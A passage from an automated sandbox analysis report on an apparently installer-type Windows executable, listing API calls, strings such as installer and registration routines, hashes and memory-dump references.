                                                                                                                        • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$Looking for %s$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 4025586506-1506763675
                                                                                                                        • Opcode ID: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                        • Instruction ID: d2b54da0a6a615d98c4bb7f4e3ad910886c78d04fea921c7db62d1ad87df31e2
                                                                                                                        • Opcode Fuzzy Hash: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                        • Instruction Fuzzy Hash: D7A1D8B2108344ABD724DF60CC45FEB73ACEB84704F44492EB98957181DB79A74DCB6A
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 004151FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00415213
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0041521E
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00415232
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0041523A
                                                                                                                        • CopyFileA.KERNEL32(?,?,?), ref: 0041524E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFind$CloseCopyErrorFirstLast
                                                                                                                        • String ID: "%s"$/s /regserver$MyCopyFile$dll$exe$exec: %s /s %s$exec: %s /s /regserver %s$ocx
                                                                                                                        • API String ID: 3483889725-3576774900
                                                                                                                        • Opcode ID: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                        • Instruction ID: 60f35962d690970186fbe8e082cbe82d24c67d20d37591994032dbb9b5c60f80
                                                                                                                        • Opcode Fuzzy Hash: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                        • Instruction Fuzzy Hash: C5A14871508740BBE320DB60CC45FEB77A8ABC9705F04465EFE8957282DB789984CB6E
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000), ref: 00413E61
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413E88
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413EA4
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00413EB8
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00414023
                                                                                                                        • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000030,00000000,00000000,0045E440,0045E484,?,?,00000000), ref: 0041405B
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0041407C
                                                                                                                        • Sleep.KERNEL32(00000001,?,?,00000000), ref: 00414098
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 004140DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$FindProcess$CloseCodeCreateErrorExitFileFirstLastSleep
                                                                                                                        • String ID: "%s"$CreateProcess$Error executing '%s'%s$Exec And Wait
                                                                                                                        • API String ID: 3676699910-1096974953
                                                                                                                        • Opcode ID: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                        • Instruction ID: 0d36562a55edf719c25e91f2d3ffa3eb5e978c8fbce3c5ea020dbcf3caa10d05
                                                                                                                        • Opcode Fuzzy Hash: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                        • Instruction Fuzzy Hash: 8081E271248341ABD320DF60DC45FEBB7A8EBC5B01F10491EFA8497280DBB99985CB5B
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 00414B6C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00414C0C
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 00414C16
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00414C2A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00414C31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFindSleep$CloseDeleteFirst
                                                                                                                        • String ID: "%s"$/s /UnregServer$/u /s$Remove$dll$exe$exec: %s /s /UnregServer %s$exec: %s /u /s %s$ocx
                                                                                                                        • API String ID: 207913334-4138445747
                                                                                                                        • Opcode ID: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                        • Instruction ID: 569dca1f961776a68051f51d760419570266c25ba139ecdaab2e0422a95345d3
                                                                                                                        • Opcode Fuzzy Hash: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                        • Instruction Fuzzy Hash: 345159B12843446BE224EB558C42FEB339CAFD5704F44491EFA88931C2EF7C954987AE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Chinese (Simplified)$Chinese (Traditional)$Czech$Danish$Dutch$English UK$English US$Finnish$French$German$Greek$Hebrew$Hungarian$Italian$Japanese$Korean$PortBrzl$Russian$Spanish$Swedish
                                                                                                                        • API String ID: 0-733503574
                                                                                                                        • Opcode ID: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                        • Instruction ID: 37a5b3b5c5b6eab396eacb203a264361d5579e56741c889a3fa2050163f780a9
                                                                                                                        • Opcode Fuzzy Hash: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                        • Instruction Fuzzy Hash: 5981481B3125C08AD769877554602BB7FA2ABAB344B1DC0BFC4886B3A2FE654C47C30D
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040A1F6
                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseNext$DeleteFirstSleep
                                                                                                                        • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 2815766398-138872489
                                                                                                                        • Opcode ID: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                        • Instruction ID: 0c91d48e411e499a262bfaaa4cfdbc113dac507737b5f6b4774de972c7e6e324
                                                                                                                        • Opcode Fuzzy Hash: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                        • Instruction Fuzzy Hash: 5261F872108340ABE720DF60CC45FEB73A8EBC4704F44492EB98957181DB79A609CBAA
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00417F1B
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00417F97
                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00417FA7
                                                                                                                        • FindClose.KERNEL32(?), ref: 00417FBA
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00417FEA
                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0041807D
                                                                                                                        • FindClose.KERNEL32(?), ref: 00418090
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004180B9
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0041813E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00418149
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext$AddressDirectoryLibraryLoadProc$DeletePathSystemTempWindows
                                                                                                                        • String ID: %s\%s$%s\*_uninst.exe
                                                                                                                        • API String ID: 1160109514-2858441004
                                                                                                                        • Opcode ID: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                        • Instruction ID: 9f6682103830e505521cd8484b6fe5b054a565d779c716c41cdb5f6c531036c0
                                                                                                                        • Opcode Fuzzy Hash: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                        • Instruction Fuzzy Hash: 5681A6B21083445BD324DF60CD45BEBB7ACEBC8714F444D1EF99583181EB789649CBAA
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414422
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041443A
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414494
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004144AC
                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 004144BD
                                                                                                                        • RemoveDirectoryA.KERNEL32(?), ref: 004144D6
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414552
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041456A
                                                                                                                        • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414585
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00414594
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseDirectoryFileFirst$Remove$CreateSleep
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 593529018-2967466578
                                                                                                                        • Opcode ID: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                        • Instruction ID: 0fb53b54470e76bddbd086c82c8af96ee8b09f8716e29362b9a934bf63ba6167
                                                                                                                        • Opcode Fuzzy Hash: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                        • Instruction Fuzzy Hash: 686128352083859FC321CF28D8447EBBBD6ABD6354F084A5DE8D483351DA39D94DCB5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
